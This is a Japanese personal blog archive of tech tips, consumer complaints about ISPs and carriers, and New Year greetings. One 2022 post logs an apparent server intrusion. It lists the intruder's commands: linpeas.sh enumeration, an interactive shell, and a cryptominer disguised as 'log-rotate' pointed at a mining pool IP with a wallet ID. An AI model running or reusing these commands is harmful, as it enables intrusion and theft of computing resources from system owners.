Home > 戯言 Archive

戯言 Archive

eo smtp(メール送信)の件

先日の「eo光 メールアドレス追加の失敗事例
といい、eoとの相性は最悪を痛感しています。

今回はeoが自宅サーバーをステルス的に除外する対応を実施された模様。
固定IPサービスを利用しない自宅サーバーは利益にならないので潰す作戦かと思われます。
要は利益優先処置の一貫。

普通に考えるとインターネットを利用するだけなのに、自宅サーバーを置くだけで約2倍の値段が必要になります。
自宅サーバーを置くことが普通かどうかはこの際問題ではなく、「個人の自由という自由権を、奪っています」。

例え、仮に固定IPサービスに加入したからといって先日までの状況以上の効果は有りません。
FYAメールアドレス(***@fya.jp)での送信が出来るだけです。
メールアドレスは元々副産物ですので、管理者としてはそこまで重要視していません。

しばらくはeoに変わるISP(プロバイダ)を検討する作業になりそうです。

関西、大阪で自宅サーバー利用するのに適していると思われるISPが有りましたら、是非ご連絡ください

参考リンク
eoでpostfixのrelayが動かなくなっていた件
2023年12月5日以降eonetのOP25B規制回避のメールリレーができない

謹賀新年

  • Posted by: 水瀬
  • 2024年1月 1日 15:49
  • 戯言

2024 謹賀新年

新年明けましておめでとうございます。

皆様のご健康とご多幸をお祈りいたしております。
本年も FYA ともどもよろしくお願いします。

水瀬

eo光 メールアドレス追加の失敗事例

  • Posted by: 水瀬
  • 2023年9月21日 00:56
  • 戯言

前回のISPとのやり取りでeo光のホームページ確認が失敗の伏線だった

HPを確認はそれとなく久方ぶりにログインしての各種確認。
その中でメールアドレスに関することが気になり、確認してみた。
追加する文には何も特筆事項は無かったので無償で追加可能なのかなと思い込んでしまい追加してしまう。

追加時には最後の最後まで必要になる追加費用は表記されない。

確か220円くらいだったかとは思うが、追加した日の月から計算されるみたいで、即削除しようとしても当日は不可能だった。
やり方が古いままで不便にも程がある。

翌日、先日追加したメールアドレスを削除したつもりが、今まで使用していたメールアドレスを削除したみたいで、相当慌てた。。
「minase@****.eonet.ne.jp」**** の部分だけが異なるモノだったので、見落としていたみたいです。
そもそも、先日追加したメールアドレスはまだ24時間が立っていなくて本来なら削除できない状態でした。
その作用もあり、 「消せるモノ」 と勘違いして操作していた事にも要因があります。

そもそもこの様な仕様で運営していることからも分かる様に、消費者をなめています。
以上、使い方を間違えた私の手痛い(イロイロと面倒な事になった)経験談でした。
現在もまだ以前使用していたメールアドレスの変更手続きが終わっていませんので重要なメールアドレスを操作する際には十二分にご注意ください。

諸費者センターへの連絡は必須事項です笑

2023 謹賀新年

  • Posted by: 水瀬
  • 2023年1月 1日 00:22
  • 戯言

2023 謹賀新年

新年明けましておめでとうございます。

皆様のご健康とご多幸をお祈りいたしております。
本年も FYA ともどもよろしくお願いします。

水瀬

過負荷

  • Posted by: 水瀬
  • 2022年7月 8日 23:17
  • 戯言

  • ファイル
    /var/spool/cron/XXX

    削除

  • コマンド
    sleep 100
    aureport --tty
    grep -E su |sudo
    sed -E s,su|sudo,?[1;31m&?[0m,g
    /bin/sh
    bash /tmp/kill.sh log-rotate
    bash -i
    /bin/sh ./linpeas.sh -a
    ./log-rotate -a rx/0 -o 172.65.226.105:3380 -u 3HwgkUDXt9Tiz7bVMb2KUk1WwFzu6xsmc ...

    Kill

  • プロセス情報
    コマンド
    ./log-rotate -a rx/0 -o 172.65.226.105:3380 -u 3HwgkUDXt9Tiz7bVMb2KUk1WwFzu6xsmcq.XXX.jp --randomx-1gb-page --cpu-priority=5 --nicehash -k -B

謹賀新年

  • Posted by: 水瀬
  • 2022年1月 1日 20:18
  • 戯言

2022 謹賀新年

新年明けましておめでとうございます。

皆様のご健康とご多幸をお祈りいたしております。
本年も FYA ともどもよろしくお願いします。

水瀬

[注文] iPhone 13 Pro Max その2

iPhone 13 Pro Max

注文日:2021年10月02日
到着 不明(記載なし)

お届け準備中

注文して直ぐに「あれ?」と思い、確認してみると、「故障紛失保証 with AppleCare Services」がパッシブで有効になり、お申し込みされていました。
念の為、キャンセルして時間を置くも(半日)処理がされておらずに最終手段のTELにてなんとかキャンセルを申し込む。
しかし、TELにて言われたのが「出荷された際には受取を拒否してください。」との方針でしたので、「家族が受け取る可能性が高い為、拒否は難しいです。」と答えるも、やはり配送されて受け取ってしまう可能性が高いと苦悩して過ごすも、夜中には無事にキャンセルが成立していました。
本音は楽天ポイントを使いたかったので、早くキャンセルが成立すると良いなと思っていたので良かったです。
キャンセルの成立にも、一週間程位かかると言われていたので、尚更良かったです。

注文日:2021年10月04日
到着 不明(記載なし)

お届け中
配達にはお時間をいただく場合がございますのでご注意ください

2021/10/04

参考リンク
iPhone 13 Pro Max - Rakuten Web Portal

※ 現時点でのこの商品はまだまだ品薄な為、Appleの方はキャンセルさせていただきました。
まさか、本家本元が出荷のペースに追いついていないとは。。

[注文] iPhone 13 Pro Max

iPhone 13 Pro Max

注文日:2021年9月18日
到着 2021/10/21 - 2021/10/28

ご注文は処理中です。ご注文の商品が出荷の準備に入り次第、お届け予定日をお知らせします。

注文日には引き落とし処理がされない模様。
第一の到着予定日である21日になっても進行状況は変わらずAppleでの対応状況に不安も感じる。
念の為にTELも行ってみるが、「処理中」との機械アナウンスでした。

さらにサポートが必要な場合0120-993-993 へ電話でお問い合わせください。

2021/10/04

※ こちらのAppleの方はキャンセルさせていただきました。
楽天モバイルにて先日(10/02)申し込んだ方が、無事に出荷されました。

参考リンク
iPhone 13 ProとiPhone 13 Pro Maxを購入 - Apple(日本)

謹賀新年

  • Posted by: 水瀬
  • 2021年1月 1日 00:00
  • 戯言

2021 謹賀新年

新年明けましておめでとうございます。

皆様のご健康とご多幸をお祈りいたしております。
本年も FYA ともどもよろしくお願いします。

水瀬

10Gbps対応について

10Gbps対応について

本記事を書いている現在(2020/08/03)では10G(ISP代+¥1,500前後/月)対応ルーターの市販品ではLANポートが未だ1つと玄人(散財出来る方?)向けとなっており、追加でハブを購入するという煩わしい状況にあります。

よって、次期目処として携帯電話(スマートフォン)の5Gが完全に浸透(馴染む)くらいまでは機器も慌てて購入する必要が無いと判断致しました。
ですので、当面の間は現在の1Gbpsで継続していきます。

利用者数も少ないFYAサーバーで、利用者様の声も聞かないのがまだマシなのでというのが大きいですが汗

2020/08/03

2020年 6月 自作PCパーツ


CPU: INTEL Corei9-9900K BOX
CPUクーラー: 虎徹 Mark II
メモリ: CORSAIR DDR4 16GB *2
マザーボード: ASUS TUF Z390-PLUS GAMING
SSD: CFD EG1VNE CSSD-M2M1TEG1VNE *2
ケース: ENERMAX ECA3360B-BT(U3)(FulmoQ ATX黒 電無USB3.0)
電源: 玄人志向 電源 80PLUS Bronze 750W ATX電源

6年ぶりの私用PC更新。
お古は弟へ譲ります。

ソフトバンク(Softbank)はオススメしない

ソフトバンク(Softbank)はオススメしない

一個人の実体験に基づくい感想です

諸事情で急いでいたので、仕事が終わりお風呂も入らず(笑)に最寄りのソフトバンク(Softbank)へ駆け込む。
「先日に別のショップで契約した物ですが解約お願いします」と言って空いていたので直ぐに対応してくれました。
ただ、昨日契約したばかりなのか分かりませんが事務処理に手間取っていた模様。
少し時間は掛かりましたが2-30分位で解約手続きが終わりました。

その後、その足でauショップへ向かい閉店の19:00に最低限の契約を終えました。
最低限 = 残りは自分で出来る

正直に言うと、店員さんの対応も各キャリア次第とかでは無く、各ショップの店員さん次第です笑
当たった担当次第?
後は今だから言えますが、契約の際は落ち着きましょう。
少しでも疑問が有るのなら「契約はせずに帰りましょう」。
契約確認の最終段階まで来ていても、思い切って言葉にしましょう。
言葉は良い意味でタダですから「すみません、(契約は)辞めておきます」と!!
(精神面で)強くなりたいですね(´・ω・`)
私の場合、折角対応していただいたのだからという気持ちが強くなるので「断り難い性格が仇となりました」。
その報いが以下になります…

解約に至る経緯

職場
自宅
アンテナ1~2(MAX4)本まれに県外と不安定

8日間キャセル契約したショップでのみ対応
既に契約を解約してから思い出したので、時既に遅し(´・ω・`)
急かすような店員に当たった場合は気持ちを切り替えて(契約しないと心に決めて)話しましょう笑

ソフトバンク(Softbank)のネットでのチャットでは「解約は契約した所でするのですか?」の様なチャットで「<8日間キャセル」は忘れており、伝えておらず「解約」したい一心で聞きました。
そこでは「解約はどこのショップでも出来ます」と答えられました。
ココがウィークポイントになる事もコレを書くまで気づかず(´・ω・`)
少し遠くても行けば良かったかもしれませんが、契約の際の私の条件が「iPhone用SIMの有無」だったので、解約した所には先日SIMが無い事が分かっていたので他ショップにしました。
auショップなんかは更に離れていますしね笑
SIMフリーのiPhoneの契約上、まずは電話にてSIMのみの在庫確認をしてからになるのも手間ですから…

話を戻して、既に他社に移行していたので「0800-919-0157」にて「自動音声(2→4→9)」にて伺ったところ、専用オペレーターへ回されるも消費者側に寄り添う誠意や姿勢も感じられずに「泣き寝入り」さすがソフトバンク(Softbank)と思えました笑
❝自分の都合よりも相手の都合を優先する事が出来ない店員に将来は無い❞以上
2日も使わず一ヶ月分」が請求される痛い勉強代となった近況の出来事でした。
厄年!?

参考リンク
ソフトバンク(Softbank) 契約のキャンセル(8日間キャンセル)

謹賀新年

  • Posted by: 水瀬
  • 2020年1月 1日 16:46
  • 戯言

2020 謹賀新年

新年明けましておめでとうございます。

皆様のご健康とご多幸をお祈りいたしております。
本年も FYA ともどもよろしくお願いします。

水瀬

[Windows 10] Skype 複数起動(多重起動)

[Windows 10] Skype 複数起動(多重起動)

"C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe" --secondary --datapath="C:\Users\ユーザー名\AppData\Roaming\Microsoft\Skype for Desktop 2"

ユーザー名Skype for Desktop 2は、ご自身の環境に置き換えて下さい。
※尚、--datapath=にあるフォルダは好きなところに変更可能です。

参考リンク
http://win.way-nifty.com/slot/2018/09/skype-for-deskt.html

謹賀新年

  • Posted by: 水瀬
  • 2019年1月 1日 00:46
  • 戯言

新年明けましておめでとうございます。

皆様のご健康とご多幸をお祈りいたしております。
本年も FYA ともどもよろしくお願いします。

水瀬

アマゾン レビュー 評価 不採用 2

  • Posted by: 水瀬
  • 2018年6月 6日 18:57
  • 戯言
Amazon Reviews <no-reply@amazon.co.jp>
劇場版 ***... のレビューは、Amazon に掲載することができませんでした

タイトル: 
***最高!!!
 
内容:
タイトル以外に書く必要性を感じない笑
写真は届けられたときの物です。

// 2018/06/05 13:54

さてさて、どれが問題なのか..
タイトルは商品をほめているので多分大丈夫?
内容は本当にその通り感じたことを書いているので書いて表せる物でもない代物なのですが..(感情論?)
となると送られてきた商品の写真?
でもこれも至って普通の発送手段なので問題はなさそう..

やっぱり「内容」が濃厚ですね..
商品を褒め称えろ的なニュアンスを匂わせる結果にやっぱり「アマゾン」も名が物語っているとしか思えなくなりました。

久方ぶりの利用&レビューがこの仕打ち..
こんな思いをするくらいならスターだけチェックしてお終いにする方向へ転換します苦笑

[愚痴] au 締め日を問い合わせるも「解りません」

au MNPによる転出後...

先月2018/04/01付けでMNP転出しました。
それは格安SIMへ乗り換えたためです。

5月分の請求書が届きました。
そこで初めて「え!?」状態になり、困惑。
私は事前に、去年から2~3回に渡り「締め日はいつですか?」との問い合わせをしていました。 そういった回答の中で、「月の上旬、5-7日前後くらいです。」との返答を得ていたにも関わらず、今回のお問い合わせで仰天。

先日の某2018/05/0*頃にお問い合わせセンター?へ質問しました。
「5月分の請求書が来ているのですが、どうしてなのでしょうか?」また、「締め日はいつだったのですか?」との様なお問い合わせをしたところ、「しばらくお待ちください」。

2~3分ほどで戻って来られて、「締め日は毎月1日になります」と言うじゃないですか!!
正直何度(2~3回)聞いても、最初が「毎月の5-7日前後」や「解りかねます」といったことを言われて居たので、私個人のauへの心象は最低のどん底まで急降下

まとめ:
結局、2018年4月1日は数分?数時間?も使っていないにも関わらず、5月分の料金が4,7**円(約5戦円)。
5kもあれば普通に外食もできたり、娯楽も楽しめます..
何より、車検が迫っているので無駄な出費を抑えたいときに限ってこんな事に直面しました。

あと、48回払いですがMNP転出だと一括払いなので6ヶ月支払っていたのに13万くらい盗られます
普通にアップルで契約した方が正解でしたね涙

消費者の私が弱い?無知?なので私が良い鴨だったのでしょう笑
鴨がネギ背負って来た的な?

最後に、先月か先々月には無かった「締め日」に関するページが出来ていました。
お役所仕事ですか、そうですか。

質問ID:k1112050173 2018年4月27日時点の情報を元に作成されたQ&Aです。 

https://www.au.com/support/faq/view.k1112050173/

謹賀新年

  • Posted by: 水瀬
  • 2018年1月 1日 00:23
  • 戯言

新年あけましておめでとうございます。

皆様のご健康とご多幸をお祈りいたしております。
本年も FYA ともどもよろしくお願いします。

水瀬

アマゾン レビュー 評価 不採用

アマゾンを利用していて折角レビューを投稿したにもかかわらず、掲載されない(不採用?)。
例:

*** 10 → *** *** *** *** 1 100*** 弱く感じて物足りなく、今現在も後者の***と併用中。

こちらの評価☆3とのことですが

商品に対してのレビューかと思われますが

弊社に対しての評価になっています。

ちなみに☆3を含む ☆3以下の出品者の評価には

amaozn運営から弊社へペナリティーが加算されてしまいます、

お手数かとおもいますが

さきほどの評価を削除お願いします、(出品者への評価の訂正はできず削除しかできないシステムでございます)

なにとぞよろしくお願いします。

普通に商品に対しての評価(レビュー)ですが…
ちなみにコレは白紙になっていました。
正直言葉が悪いですが、クソだと思えました。
(以下に上げている失敗談もです;)
(アマゾンという)名前だけが一人歩きしている結果に思えました。
レビュー(評価)数が数百以上の硬い商品を購入しておくと、ココまで酷い結果には繋がらないかと思えます。

失敗談1.
ついでに今愛用している iPhone X のケースですが以下になります。
https://www.amazon.co.jp/gp/product/B074MZ86MJ/
こちらは絶対買わないほうがいいです。
レビューに書いたとおりの結果です。
商品のiPhoneがスペースグレイ?だったらしく背面まで黒のカバー(ケース)だと思い込んでいました。
テストするように促されていたので、2H耐水性を確かめる為に湯桶にて検証。
2H後…レビューにも書いた通り(消されていなければ…)ケースが剥がれない(開かない[開けられない])。
二人で悪戦苦闘。
取り敢えず、夕飯を食べてから壊す気でマイナスドライバーによる、事前にちょびっと開いていた隙間に差込押し広げるようにして開ける事ができました。
ココまでして、高評価している方々はテストしないで入れているのかなと思えました。
後、声が相手には聞き取れない事も判明。
でも根性で使い続けることにします。
当たらない宝くじが当たるまで!(笑)

失敗談2.
iPhone前日の購入前に両者を発注していたのがダメでした。
https://www.amazon.co.jp/gp/product/B076M55FZL/
こちらはブルーライトカット ガラスフィルムなのが気に入り注文したのですが、 iPhone X 購入時に特典?としてコチラか、お米5Kgを選べるので普通のガラスフィルムにしました。
ですので到着していないのでキャンセルしたのですが、発注済となっており断念。
近所の郵便局から以前にアマゾンから届いたプチプチ付きの封筒にて返送。
送料は約740?780?と、普通にマイナス約800円という最悪な結果でした。


今期は買い物で失敗いっぱい(´・ω・`)

謹賀新年

  • Posted by: 水瀬
  • 2016年1月 1日 00:02
  • 戯言

新年あけましておめでとうございます。

皆様のご健康とご多幸をお祈りいたしております。
本年も HXP ともども、よろしくお願いします。

水瀬

Skype(スカイプ) アップデート 無効

使用するVerのSkypeをインストール後のお話。

Windows Update に Skype の更新があれば右クリックから 更新プログラムの非表示 にしておく。

起動した Skype > ツール > 設定 > 詳細 > 自動アップデート で 自動アップデートをオンにする になっていることを確認する。
オフの場合は、オンにする。
※オンにする になっている場合は、設定上の自動更新はオフである。

ファイル名を指定して実行... > %Temp% にフォルダー SkypeSetup.exe を作成する。
その後、 ヘルプ > アップデートの確認 をする。
うまくいっていれば、更新されません。

ファイル名を指定して実行... > msconfig のスタートアップタブにある Skype 自動更新があれば無効化する。

コントロールパネル >システムとセキュリティ > 管理ツール > サービス にある、 Skype Updater を無効にする。

以上をしても、アップデートが来るのは本当にいい迷惑。

参考リンク
http://blog.livedoor.jp/blackwingcat/archives/1522375.html

LG ディスプレイ(モニタ) 暗くなる

  • Posted by: 水瀬
  • 2015年10月29日 17:53
  • 戯言

動画鑑賞していて暗闇な場面になると更に暗くなっているのに気づく..

気づくまでは ? (気のせい?) と思っただけでしたけど、何度も経験して !? あれ?と思い検索してみる。
私は初めモニタ側の設定が関係していると思っていた。
だけど何度も経験する前なので、詳しくは調べなかった。
でもやっぱり勝手に暗くなっていると確信して、本日真面目に調べてみた。

案の定、答えとしては当初の予定通りモニタ側の設定だった。
検索では電源の設定が多くHitしていたので、惑わされかけました。

答えは LG モニタの
SMART ENERGY SAVING
でした。

High
Low
オフ
3択でLowでしたから、オフに変えて落ち着きました。

節電(省エネ)目的で動作する機能(怒
ユーザー泣かせ過ぎる機能とか..

モニタの色調(色合など)取り敢えずおかしくなったと感じたら

掃除をしていて抜いているHDMIケーブルを丸めていたらモニタの色が薄緑色がかってしまった。
抜かれているので本来は無縁だと思えるのだけど...(※PC側は挿入されたまま[TV側着脱済])

コントロールパネル > ディスプレイ > 色の調整

または、コントロールパネル > 色の管理 > 詳細設定 >> ディスプレイの調整 。

取り敢えずは [完了] が出るまでGo?
[ClearType テキスト チューナー] も全部 [次へ] で [完了] です。

※いつものことですが、本記事も自己責任です。
よく解らない状況になっていて少し四苦八苦しちゃったので記事にしてみました。

追記: モニタがお亡くなりになられたみたいです…

追記2: 翌日もおかしくなりましたから、先日にモニタを購入しました。
だけど、翌々日になると不思議なことに正しい発色に戻りました。
購入したモニタは予備として控えさせることにしました(苦笑

追記3(2015/10/24): 先日またも変色したので、購入していたモニタへ換装しました。
にもかかわらず、変色は治りません。マシにはなっているとおもいますが、そこそこの頻度で変色が発生しています。

追記4(2015/10/25): 換装したモニタでも変色を確認したので、OSを入れなおしています。
入れなおす中で、PC本体側のGB(グラボ)との接触が違和感があったので念入りに接続しておきました。
入れなおす前に辿り着きたかった原因?でした。
取り敢えずは様子見します。以降追記なければモニタ代の勉強代ですね...

RAMDISK化 解除

RAMDISK化の記事を投稿していなかったので、解除してみる事を機会に投稿。

RAMDISK解除の理由

ぞくにいわれるブルースクリーンが発生するためです。
※BSoD

ソフトの起動や何かに起因して発生しています。
まぁ、結局RAMDISK化なのがダメかなという事で、解除しておくことにしました。
参考リンクはRAMDISK化で参考になったページのひとつです。

参考リンク
http://www.tipsfound.com/Windows7/02005.vbhtml

謹賀新年

  • Posted by: 水瀬
  • 2015年1月 1日 03:03
  • 戯言

新年あけましておめでとうございます。

皆様のご健康とご多幸をお祈りいたしております。
本年も HXP ともども、よろしくお願いします。

水瀬

skype 指定先からユーザーデータを読み込む (I/O軽減対策?)

以前からしていたのですが、一点を設定していなくてskypeのアップデート後に以前と違う感じになっていたので改めて検索して戻しました。
原因が解れば、こういう設定していたのねと…苦笑

  1. スタートメニューのプログラムから Skype をクリックして更にその中の Skype を右クリックしてプロパティを選択。
  2. ファイルの場所を開くをクリック。
  3. 念のためにショートカットを作成。
  4. 作成したショートカットを右クリックしてプロパティを選択。
  5. x64の場合:
    "C:\Program Files (x86)\Skype\Phone\Skype.exe"
    に以下のように最後に追記します。
    "C:\Program Files (x86)\Skype\Phoe\Skype.exe" /secondary /datapath:"Z:\Skype"
    ※/secondary 多重起動
    ※/datapath:"パス" 指定先から読込
    ※"C:\Users\ユーザー名\AppData\Roaming/Skype"がある場合は事前に移動
参考リンク
http://aoking.hatenablog.jp/entry/20111209/1323419749

Image::Magickが認識されていない by MT4.xx

Image::Magickが設定されていません。Image::Magickがインストールされていないかまたは正しく設定されていないため、Movable Typeのユーザー画像機能を利用できません。この機能を利用するには、Image::Magickをインストールするか、他のイメージドライバを使用する設定を行う必要があります。

MT4シリーズでも認識されるものはされます。
マイナーバージョン違いに何があったのでしょう笑

取り敢えず認識させて鬱陶しい表示を消す方法。

[mt-config.cgi] を開き、最後にでも [ImageDriver GD] を追加。

これで、HXPでは表示されなくなります。

参考リンク
http://www.movabletype.jp/documentation/appendices/config-directives/imagedriver.html

Postfix de 躓いた笑

Postfix というよりは SMTP かもしれませんね。
直ぐに受信は確認できましたし…
これまた直ぐに送信も…
後から思い出しても、どうして直ぐに送信できないのか…
SMTP の認証でコケていたみたいです。

かなり久方ぶりの再構築ですから、そのあたりはご愛嬌でお願いしますね。

そして改善した方法すら…今は思い出せないでいます涙
どうして改善したのでしょうね…

想い出しましたら編集しておきます涙
PAM認証かもしれません…謎

参考リンク
http://www.usupi.org/sysad/210.html
http://www.uetyi.mydns.jp/wordpress/postfix-setting/entry-465.html

関係ないですが、圧縮通信の可否確認サイトをご紹介しておきますね。
参考にしていたサイトが軒並み404なので…

参考リンク
http://www.gidnetwork.com/tools/gzip-test.php

CentOS 6.5 (x86_64) suPHP 0.7.2 test目的でソースコードから

以前に CentOS を入れた64bit機へ suPHP を導入

前提環境

Package Version
Apache 2.2
PHP 5.3

Continue reading

RT58i WOL 遠隔起動

RT58iは使用しているルーターの商品名です。
今回の鍵です笑

WOLは検索下さい。
きっと分かっていると思うので割愛します。

PC側のWOL設定は済んでるものとしてお話します。

シャットダウン直後では期待通りの結果を得られるのですが、しばらくしてからでは起動しません。
調べてみると、ARPが関係していた模様。
ARPはTTL値を経過するとクリアされてしまうので、起動しなくなるんです。
そこでルーターの登場になります。
紐付けされているARPを静的に有効にしちゃいましょう。

[トップ] > [詳細設定と情報] > [コマンドの実行]

ip lan1 arp static 192.168.xxx.xxx xx:xx:xx:xx:xx:xx

192.168.xxx.xxxはあらかじめ設定したローカルIPになります。
そのIPが持つMACアドレスがxx:xx:xx:xx:xx:xxです。

わたしはiPhoneで遠隔起動を行っていますが、まだまだ様子見中です

翌日追記
iPhoneのアプリには無料のRemoteBoot WOLを使用しています。
ローカルIPからでは起動しませんでした。
ローカルブロードキャストでは起動しました。なぞ
グローバルIPからでは起動しました。
仕組みがわかりませんけど、起動したので一時OKとします。

参考リンク
http://blogs.yahoo.co.jp/koma2_70/15720748.html

iPhone に App SideBooks with dropbox インストール

殆ど外出しないのに、気になったので暇つぶし用に入れました。
他の暇つぶし用のものが、お蔭様で後回しかも笑

ビュ-ア-を選ぶのは簡単でした。
無料を探せばいいだけですからね。
有料なら考えるまでもなく ”アレ” でしょうけどね?

これにしたけど、圧縮じゃないと読み込まれない;
圧縮前の状態で使えれば楽なのに…
圧縮なんてほっとんどされていないんだから…
だってーテキストじゃないもん!
これを書く前から、該当ファイルをクリックしているけど…いまだに開かないとか;
もし、毎回こうなると考えるとかなり鬱ですね…

Dropbox も共有ドライブ変更が必要でしたし、元ファイル消せないのかYO
と思ったら解凍されて消せるようです。

まあ、兎に角終わったので良しとしましょう。
Dropbox がインストール後からトレイにアイコン見えているけど、OS起動時に起動するんじゃ…
と思って、トレイから基本設定を眺めるとやっぱり起動しちゃうみたい笑
不要なのでチェックを外しました。

今度こそ終了です。

java アプリケーションがブロックされました。

セキュリティ設定によってブロックされたアプリケーション
ご使用のセキュリティ設定により、自己著名付きサンドボックス・アプリケーションの実行がブロックされています。

上記のような症状が、あることをしようとしたらでました。
java は更新される度に使いづらくなりますね;

解決策?は、コントロールパネルから [Java] をクリックし、 [セキュリティ] タブを選択して 例外サイト・リスト にある [サイト・リストの編集] をクリックしてから、 [追加] をクリックしブロックされたサイトのURLを記入して [OK] を選択。
更に [OK] で終了です。

謹賀新年

  • Posted by: 水瀬
  • 2014年1月 1日 00:25
  • 戯言

新年あけましておめでとうございます。

皆様のご健康とご多幸をお祈りいたしております。
本年も HXP ともども、よろしくお願いします。

水瀬

Microsoft + Skype + Facebook アカウント統合

  • Posted by: 水瀬
  • 2013年12月21日 13:37
  • 戯言

Skype で Microsoft(メッセンジャーなど) と Facebook のアカウントと統合しました。

Skype と Microsoft アカウント統合方法

1. Skypeを起動します。(起動している場合はログアウト。)
2. [Microsoft アカウント] をクリック。 [Microsoft アカウント] と [パスワード] を入力して [サインイン] をクリック。(自動ログインはお好みで)
3. [既存の Skype アカウントを使用する] をクリック。 [Skype名] と [パスワード] を記入して [サインイン] をクリック。問題がなければ [続行] をクリック。

次回からは、MicrosoftアカウントからSkypeにサインインします。
間違えた統合をしてしまった場合は、 SkypeとMicrosoftやFacebookのアカウント間のリンクを解除する方法を教えてください をご参照ください。

あと、 Facebook も統合できますね笑

Skype と Facebook の統合方法

ログイン状態で [すべて ▼] みたいなのをクリック [Facebook] をクリックして [接続] をクリック。
あとは、 [Facebook] の [アカウント(メールアドレス?)] と [パスワード] を入力するだけです。

参考リンク
http://tam-network.cocolog-nifty.com/tam_networks_blog/2013/03/livemicrosoftsk.html

Google Chrome で Password が保存されない

  • Posted by: 水瀬
  • 2013年9月11日 14:57
  • 戯言
https://accounts.google.com/

ログアウトしてからログインしようとして気づきました。
アカウントもパスワードも保存されていないと。
アカウントとパスワードを入力してログインしてみて、直ぐにログアウト、そしてログインをしてみたらやっぱり保存されていませんでした。

検索で調べてみて

Autocomplete = on

を導入しても変化はありませんでした。
止む無く再インストールで解決に至りました。

クロームいれたの半年前でした苦笑
普段はFirefoxの派生Waterfoxを愛用しています。

SSI 文字化け解消 and .htaccess de HTML demo SSI

  • Posted by: 水瀬
  • 2013年1月 4日 20:24
  • 戯言

SSIを使用して、エラードキュメントの年数をリアルタイムに反映しようとして挫けました。
そんな時のお話です。

時刻表示形式(#config timefmt)

<!--#config timefmt="~" -->
「~」には下記の表を基に記入します。

置換文字 表示例 意味
%c 10/30/97 11:22:33 月/日/年 時:分:秒
%x 10/30/97 月/日/年
%X 11:22:33 時:分:秒
%y 97 年(2桁)
%Y 1997 年(4桁)
%b Oct 月(3文字)
%B October 月(フルスペル)
%m 08 月(2桁)
%a Sat 曜日(3文字)
%A Saturday 曜日(フルスペル)
%d 30 日(2桁)
%j 223 1月1日からの日数
%w 6 日曜日からの日数
%p PM AMもしくはPM
%H 23 時(24時間制)
%I 11 時(12時間制)
%M 44
%S 56
%Z JST タイムゾーン

環境変数表示(#echo)

<!--#echo var="DATE_LOCAL" -->
本来はこれで上で設定した時刻表示形式で表示されるのですが、文字化けしました。

そこで調べて下記のようになりました。

<!--#config timefmt="%Y年" --><!--#echo var="DATE_LOCAL" encoding="none" -->

.htaccess de HTML demo SSI

.htaccess には下記のように記入します。

Options +Includes
AddHandler server-parsed html
参考リンク
http://www.ranonet.com/linux/memo/archives/2011/02/11180747.html
http://mikeneko.creator.club.ne.jp/~lab/web/htaccess/ssi.html

謹賀新年

  • Posted by: 水瀬
  • 2013年1月 1日 19:30
  • 戯言

あけまして、おめでとうございます。

皆様のご健康とご多幸をお祈りいたしております。
本年も HXP ともども、よろしくお願いします。

水瀬

EasyBCD ブートローダをカスタマイズしてデュアル or マルチブート

EasyBCDを入手してインストールします。

EasyBCDを起動したらAdd New Entryを選択して、追加したいOSの情報を選択します。 私の場合はXPを追加したかったので、WindowsタブでTypeWindows NT/2k/XP/2k3を選択。 お好みのNameを入れても構いません。(デフォルト:Microsoft Windows XP) 終わったらAdd Entryをクリック。

View SettingsEdit Boot Menuで追加されていることを確認できればOKです。 気になる場合は念のため、コマンド プロンプトbcdeditを打てば確認もできます。(表示されない場合は「管理者として実行」してください)

当方の場合の結果。

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\水瀬 みなせ みっちゃん みーちゃん みー VXI ビクシィ びくしぃ>bcdedit

Windows ブート マネージャー
--------------------------------
identifier              {bootmgr}
device                  partition=\Device\HarddiskVolume1
description             Windows Boot Manager
locale                  ja-JP
inherit                 {globalsettings}
default                 {current}
resumeobject            {f7872f7d-b7ef-11dc-a958-8f27cb586085}
displayorder            {current}
                        {f7872f82-b7ef-11dc-a958-8f27cb586085}
toolsdisplayorder       {memdiag}
timeout                 30

Windows ブート ローダー
--------------------------------
identifier              {current}
device                  partition=C:
path                    \Windows\system32\winload.exe
description             Microsoft Windows 7
locale                  ja-JP
inherit                 {bootloadersettings}
recoverysequence        {f7872f7f-b7ef-11dc-a958-8f27cb586085}
recoveryenabled         Yes
osdevice                partition=C:
systemroot              \Windows
resumeobject            {f7872f7d-b7ef-11dc-a958-8f27cb586085}
nx                      OptIn

リアル モード ブート セクター
--------------------------------
identifier              {f7872f82-b7ef-11dc-a958-8f27cb586085}
device                  partition=C:
path                    \NST\ntldr
description             Microsoft Windows XP
参考リンク
http://blog.goo.ne.jp/aopen000/e/5a6b5772059423e934c0d3212bc5ff76
http://mikasaphp.net/easy_bcd.html

PC半壊

  • Posted by: 水瀬
  • 2012年11月15日 19:45
  • 戯言

カウントダウンきちゃったかも?
2012/11/14 16:00 - 15 06:00

PCやヴぁうぃ
RAID(GSATA)逝った(><
Cは勿論のこと、プログラムを入れていたドライブ(E)まで…
おまけにWaterfox(Firefox)のブックマーク消失
Syncダメダメかも…リカバリキーって…何のためのパスワードなのやら
ちなみに RAID GSATAII だけなので、6つあった SATA が4つになりました。
この GSATAII が逝くとIDEとしても機能しないという落ちでした。
他にもいろいろ大変でしたが、OS入れ直して4基のHDDだけになりました。
DVDドライブはあるのに、 SATA ポートありましぇん(><

ちなみにパソコン自体は10年落ちくらいになります。

メモリ増設

  • Posted by: 水瀬
  • 2012年11月 9日 19:10
  • 戯言

ヤフオクにて購入したメモリのお話。

Continue reading

Core 2 Quad Q6700 取り替え(E6600 > Q6700)

  • Posted by: 水瀬
  • 2012年11月 1日 19:51
  • 戯言

この日記は、自分への注意文です。

ヤフオクで中古で購入した Q6700 へ E6600 から換装しました。

まず、CPUファンを外すために4ヶ所を矢印通りに回して引っ張り上げて外します。
その後、CPUを外して換装します。
それからファンを付けるのですが、うまく入らずに爪の部分を折っちゃいました。
このファンは以前から付けていたファンなので、仕方なく付属品の方を使いました。

取説は読んでおいた方がよかったと少し思います。
読んでいても、どうなっていたかは不明ですが(><

もともと以前からついていた方のファンは、爪がハの字に広がっていたので押し込んだときに折れただけだと思うけど(;;
もう少し着脱簡易な仕様ならよかったのに…

CSSハック IE8のみ適応

  • Posted by: 水瀬
  • 2012年10月18日 02:31
  • 戯言

IE8で一部が表示されないときのメモ

head/* */body #sample
使用中
html>/**/body #sample
一部が表示されないという症状が発生
参考URL
http://css-eblog.com/csshack/box.html

IE8 Babylon Search 新しいタブ 解決策 XPの場合

  • Posted by: 水瀬
